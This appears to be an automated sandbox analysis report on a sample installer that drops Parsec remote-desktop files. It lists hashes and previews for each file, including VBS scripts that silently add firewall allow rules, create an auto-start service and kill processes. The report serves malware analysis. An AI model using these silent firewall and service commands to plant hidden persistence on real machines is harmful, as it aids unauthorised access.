                            Size (bytes):907184
                            Entropy (8bit):7.983961364658659
                            Encrypted:false
                            SSDEEP:24576:Ib45b9QaRG2zB9aKXrZ6bcmH0q8qHFael5:CsuWGcjLzmUaHX
                            MD5:2D009D446A0BA83EC2F12242F7ED126C
                            SHA1:7E5346787E8950A8B3F17FB3F527E0F80055F059
                            SHA-256:436088A5EB416935D7BD452E4E53123C2E65B737EAB7D98EBE1913618F95E61B
                            SHA-512:1A3E761F5CB3AD8B4979D60D197AB5FF75929408DDB065080D687BE02A33058A953DFCB8F01E5B87332FE54CF578BED191122E57BB2F0D2FCF7A6874DFAF8A57
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................;.....@.........................................................(....)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Program Files\Parsec\wscripts\firewall-add.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):307
                            Entropy (8bit):4.83986109060373
                            Encrypted:false
                            SSDEEP:6:jeUicmAN+7ysIkgOr39TksxYOpLzLYHHiRXZawuxAWFTOuJ85LLn:ixc3AAjA39TXppmHy0wBC6uJ8t
                            MD5:882374285898F16B5F9FF44AFC1AE701
                            SHA1:31C9445557C9B8ECDA1F0A6D5FF666E01DD1C3CA
                            SHA-256:0BE5AA5CC6395A86878F56B131E13DB4908E48F06E892FF8F8CF9E2D3B6C8ABB
                            SHA-512:3B05158B03B57A4D2CBFEE9CEF6ADFE973D080264A88E5CDEB85C59B567529CD1CD2A3B5D8538CB8637D140FD8691DC8826388AB669B7BFB2D5C1C4174069243
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..path = Wscript.Arguments(0)..args = "netsh.exe advfirewall firewall add rule name=Parsec dir=in action=allow program=""" & path & """ enable=yes profile=public,private,domain".sh.Run args, 0, true.

                            C:\Program Files\Parsec\wscripts\firewall-remove.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):367
                            Entropy (8bit):4.612954361510431
                            Encrypted:false
                            SSDEEP:6:jeUicmAN+7ysRT/mivYOLLLv8T/mivYTq7Lv8T/mivY1q7Ln:ixc3ApT/mivpLv8T/miviI8T/mivf
                            MD5:5D4D70CDF36FCDAA292DA1DA9133320C
                            SHA1:92DC18D3D1128D43F482AB56804136C687B00713
                            SHA-256:75F1DECE4FDA689A907F6D74B513ADB0C1771C1B79EA71160179542C9C4AB2F0
                            SHA-512:B54C92FBECB10DDF66D1B7AD950FFBC13F504C71081A8BD56C28C5689A2BF19BD81B467E0697C38F140C72A273EB9EB837105E738C6F1AC4F43344E2AB521778
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args..args = "netsh.exe advfirewall firewall delete rule name=Parsec".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsec.exe".sh.Run args, 0, true..args = "netsh.exe advfirewall firewall delete rule name=parsecd.exe".sh.Run args, 0, true.

                            C:\Program Files\Parsec\wscripts\legacy-cleanup.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):115
                            Entropy (8bit):4.642094539330562
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCoOWuu5G3RKLfObvn:jeUi+4uu5GcyLn
                            MD5:C78520C3162C1962F3164714B37EB4D0
                            SHA1:67C19B8AEA7AD99465976DBCD3EFCFDD7D62E3FE
                            SHA-256:DEA38BD553ABE93C689DE42D0220ADD18F9BE3E3D2FA53F97EB8649F586DF4F3
                            SHA-512:CFBFC2C7DD8019F98B77E8881680EF9D0135A210FB9B0136A4992C236D971E247AA1641CD2EAFDC5F6F5BB61002B30EA14B226127C4CEF04F3B3D6BE3A941FCC
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "schtasks /delete /tn ParsecTeams /f".sh.Run args, 0, true.

                            C:\Program Files\Parsec\wscripts\service-install.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):412
                            Entropy (8bit):4.864624018635759
                            Encrypted:false
                            SSDEEP:12:ixc3AAl7J2WjifH0//37ClesqAIN58CzA7n:iOAs7T//7D7AjG+n
                            MD5:971E2A344A6E17347A81EEB21ADA7BA7
                            SHA1:37E034C29ADDA9B118B75BFDC7C6F41AAC71E257
                            SHA-256:01F62A12DE3307B375DFF3EBCD6961D76FFCBC24F70682C7875655A811CE76A1
                            SHA-512:5EA0750DC07FF1A0EB1807043B48FB9ED54F6DCB96CE03CB543B0EA36D326779814B6CB87091373574911662A35D75B576E35C5B8D781DB36FE1503F8287C65D
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Set fs = CreateObject("Scripting.FileSystemObject").Dim args.Dim path..If Wscript.Arguments.Count = 0 Then..path = fs.GetAbsolutePathName("") & "\pservice.exe".Else..path = Wscript.Arguments(0).End If..args = "sc.exe create Parsec binPath= ""\""" & path & "\"""" start= auto type= interact type= own".sh.Run args, 0, true..args = "sc.exe start Parsec".sh.Run args, 0, true.

                            C:\Program Files\Parsec\wscripts\service-kill-parsec.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):164
                            Entropy (8bit):4.745893446511344
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCodNFfXSDoqObvv8oFKsocGAM4JqObvn:jeUi+C/SD+Lv81cXMq7Ln
                            MD5:F7B0C63E7AEA5CBD96F7BF1021B28B73
                            SHA1:FC5B11A6BF022740DE3BA15455B06AD3F061366B
                            SHA-256:71F9CC28497B959377439F6611615EF582745DD5B9CCA02B5C4B24BB1FC3DFB8
                            SHA-512:C957B7B45B188AF0B6E6698507E94564E8E5CCC8DBF5F0237827DF373878291095887422584F7F3B7833CBCDD682531FA75C974BA1137031B32BF2FFBA268191
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe control Parsec 200".sh.Run args, 0, true..args = "taskkill /F /IM parsecd.exe".sh.Run args, 0, true.

                            C:\Program Files\Parsec\wscripts\service-remove.vbs

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):150
                            Entropy (8bit):4.521058872484995
                            Encrypted:false
                            SSDEEP:3:jeYcRm81GX7Z9HCCodNFNv1p+aObvv8odNFPmYaObvn:jeUi+CNj+LLv8CuYLLn
                            MD5:B90E75DD7903CB2D6328BB3714865C7A
                            SHA1:2D32868DEB198726ED5FEB80B66542BAD7FBACEE
                            SHA-256:970B3C2A9EA1906A177810990478932E3517F47ABA267CF2AB9E4BA65E7B475F
                            SHA-512:3D4BFB86EC98FD85843AE5B63DCF5F475C6500380F02BB4D0DEE15A5F7E2334ABDBBCD9420B8AC05B5BEB8A63B9EA16ABCD70AE01C04B87A423FC288FF4DCA0A
                            Malicious:false
                            Preview:Set sh = CreateObject("Wscript.Shell").Dim args..args = "sc.exe stop Parsec".sh.Run args, 0, true..args = "sc.exe delete Parsec".sh.Run args, 0, true.

                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Parsec\Parsec.lnk

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Mar 28 13:46:56 2024, mtime=Thu Nov 14 00:58:31 2024, atime=Thu Mar 28 13:46:56 2024, length=465792, window=hide
                            Category:dropped
                            Size (bytes):800
                            Entropy (8bit):4.574199321638663
                            Encrypted:false
                            SSDEEP:12:8unXk1c0YXZh9GKe0bdpF44X82BErlQ0aYtKjA53bdpW31l6Wz1mV:8s0Kkgd7BMt2A9dIFj1m
                            MD5:35E8CFC2244D10192DBADA2916F590CA
                            SHA1:FEA96A9CE59D2D891F1310097ED092A0834AC80D
                            SHA-256:FC3B4A9A9A90783F237EA4029F76940F5655F3FA0E4E3ACD39CEC57B557C87CD
                            SHA-512:5E26D5D25DA6F9CF1DB39723C1E6D1D7B3590072DC30902F7B126E4FC7A98088562DC56A604B0FE8A4BEEB8FD2623FF557CCBBA7C63E42AEA49463A6C516E285
                            Malicious:false
                            Preview:L..................F.... ....0.......;.86...0..............................q....P.O. .:i.....+00.../C:\.....................1.....nYM...PROGRA~1..t......O.InYM.....B...............J......t.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....nYP...Parsec..>......nYM.nYP.............................%.P.a.r.s.e.c.....b.2.....|X.u .parsecd.exe.H......|X.unYP...............................p.a.r.s.e.c.d...e.x.e.......R...............-.......Q...........lb>l.....C:\Program Files\Parsec\parsecd.exe..2.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.P.a.r.s.e.c.\.p.a.r.s.e.c.d...e.x.e.`.......X.......506407...........hT..CrF.f4... .T.2=.b...,...W..hT..CrF.f4... .T.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                            C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl

                            Download File
                            Process:C:\Windows\System32\runonce.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):24576
                            Entropy (8bit):2.0984574355600807
                            Encrypted:false
                            SSDEEP:384:nuRJRk8tA/cG7w9GWDX9zAB/YB/q14eBKWtzrgUKeyxNZBDRnITNVOk1d6SVhzuc:pDD
                            MD5:9E2A70FC76A9393BFD2CC00E75D1DB88
                            SHA1:6084D21B93A4CE88F16F90D2FEA0E773C06E1B80
                            SHA-256:4D285F6674FD4B067099A39E7DAC54655BC13FAE5FCA5DC6028B576973BE9FBF
                            SHA-512:E656753E92ABDF2F82EC3FBE018E353943879B8672BB50E942BF733ED50F6851754186E21CF19CD6A4BE6D26DDAD2B435365FBC2AD744E9535B65D7A958F7366
                            Malicious:false
                            Preview:. ..............................................................................d...x.................... ......eJ........v.86..Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1............................................................J.................86..........E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.E.x.p.l.o.r.e.r.\.E.x.p.l.o.r.e.r.S.t.a.r.t.u.p.L.o.g._.R.u.n.O.n.c.e...e.t.l.........P.P.d...x...................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp

                            Download File
                            Process:C:\Users\user\Desktop\uu8v4UUzTU.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3220480
                            Entropy (8bit):6.3129799359419705
                            Encrypted:false
                            SSDEEP:49152:Odx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgS:vHDYsqiPRhINnq95FoHVBy333CB
                            MD5:828B7D7624C14BE1F3D8122F6E2FAC53
                            SHA1:1E51B52B0E6AA39BB4C465767E5131B99E39CAB2
                            SHA-256:6F28DFB808D325740AE9189598AD4AB2D7E2B77293DCFBB7A6B00AC852B719DF
                            SHA-512:E83136F55417D0AD0748A78FAA7E9C88885520B4B596ACA51B70F3816D21FD71112A0BD1E6968FB8CB22E5C3956B3BA0A5D20DACFC54F1EEF3EAB5FC7661DDCB
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................

                            C:\Users\user\AppData\Local\Temp\is-O9NMT.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\System.dll

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsg84FF.tmp\nsExec.dll

                            Download File
                            Process:C:\Program Files\Parsec\vdd\parsec-vdd.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj258A.tmp\ApplicationID.dll

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):200704
                            Entropy (8bit):6.552977186185562
                            Encrypted:false
                            SSDEEP:3072:2pBNN6AmU9cDlKd3P6V9nSm49WTgKg4Fa1V3FuXRAuAg0FubA9cVsL+73:2pzxmQ3yL+9MgKbxAOEXY
                            MD5:A858C1A57E32485505B1977CF0A125BE
                            SHA1:25D86C4B51F7CC10FC70E3A0493A39C4460CC350
                            SHA-256:1462A072345E86318B981089B08B613A34027DDF527BFB66606C683F218FC3B4
                            SHA-512:32B597FC2412A9407FD12AC77C556FF9740F1DD0D2055426D11A7BAF21B09C536A84CFB97865B4E94168656514E7CE71EB2BC4122AA340100F4CE483BAD1722D
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......;.....Q..Q..Q.@SQs.Q.@QQ..Q.@PQb.QD..Pj.QD..PN.QD..P_.Q.#lQ~.Q.#iQv.Q..Q..Q.P~.Q.P~.Q.]Q~.Q..5Q~.Q.P~.QRich..Q........................PE..L.....sX...........!.........2...............................................p............@.................................d...d....0..P....................@..| ......p...........................`...@...............X............................text...c........................... ..`.rdata..<...........................@..@.data...(...........................@....gfids..............................@..@.tls......... ......................@....rsrc...P....0......................@..@.reloc..| ...@..."..................@..B........................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj258A.tmp\System.dll

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsDialogs.dll

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):9728
                            Entropy (8bit):5.158136237602734
                            Encrypted:false
                            SSDEEP:96:o0svUu3Uy+sytcS8176b+XR8pCHFcMcxSgB5PKtAtgt+Nt+rnt3DVEB3YcNqkzfS:o0svWyNO81b8pCHFcM0PuAgkOyuIFc
                            MD5:6C3F8C94D0727894D706940A8A980543
                            SHA1:0D1BCAD901BE377F38D579AAFC0C41C0EF8DCEFD
                            SHA-256:56B96ADD1978B1ABBA286F7F8982B0EFBE007D4A48B3DED6A4D408E01D753FE2
                            SHA-512:2094F0E4BB7C806A5FF27F83A1D572A5512D979EEFDA3345BAFF27D2C89E828F68466D08C3CA250DA11B01FC0407A21743037C25E94FBE688566DD7DEAEBD355
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..c8O`08O`08O`08Oa0.O`0.@=05O`0llP0=O`0.If09O`0.od09O`0Rich8O`0........PE..L.....Oa...........!.........0......g........0............................................@..........................6..k....0.......p...............................................................................0...............................text............................... ..`.rdata..{....0......................@..@.data...h!...@......................@....rsrc........p....... ..............@..@.reloc..~............"..............@..B................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj258A.tmp\nsExec.dll

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\System.dll

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):5.814115788739565
                            Encrypted:false
                            SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                            MD5:CFF85C549D536F651D4FB8387F1976F2
                            SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                            SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                            SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\UserInfo.dll

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3422620069068625
                            Encrypted:false
                            SSDEEP:48:qKDBQE7F4aBr1wH8l9QIXTZShMmj3jkCTbGr7X:5WkFZruHSXTH6jkCnGr7X
                            MD5:2F69AFA9D17A5245EC9B5BB03D56F63C
                            SHA1:E0A133222136B3D4783E965513A690C23826AEC9
                            SHA-256:E54989D2B83E7282D0BEC56B098635146AAB5D5A283F1F89486816851EF885A0
                            SHA-512:BFD4AF50E41EBC56E30355C722C2A55540A5BBDDB68F1522EF7AABFE4F5F2A20E87FA9677EE3CDB3C0BF5BD3988B89D1224D32C9F23342A16E46C542D8DC0926
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L...!.Oa...........!................~........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...h....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\nsj59D8.tmp\nsExec.dll

                            Download File
                            Process:C:\Program Files\Parsec\vusb\parsec-vud.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):5.298362543684714
                            Encrypted:false
                            SSDEEP:96:J9zdzBzMDByZtr/HDQIUIq9m6v6vBckzu9wSBpLEgvElHlernNQaSGYuH2DQ:JykDr/HA5v6G2IElFernNQZGdHW
                            MD5:675C4948E1EFC929EDCABFE67148EDDD
                            SHA1:F5BDD2C4329ED2732ECFE3423C3CC482606EB28E
                            SHA-256:1076CA39C449ED1A968021B76EF31F22A5692DFAFEEA29460E8D970A63C59906
                            SHA-512:61737021F86F54279D0A4E35DB0D0808E9A55D89784A31D597F2E4B65B7BBEEC99AA6C79D65258259130EEDA2E5B2820F4F1247777A3010F2DC53E30C612A683
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L.....Oa...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET612A.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                            C:\Users\user\AppData\Local\Temp\{0bfc15e2-0e86-4044-8941-72f0e156798b}\SET613B.tmp

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
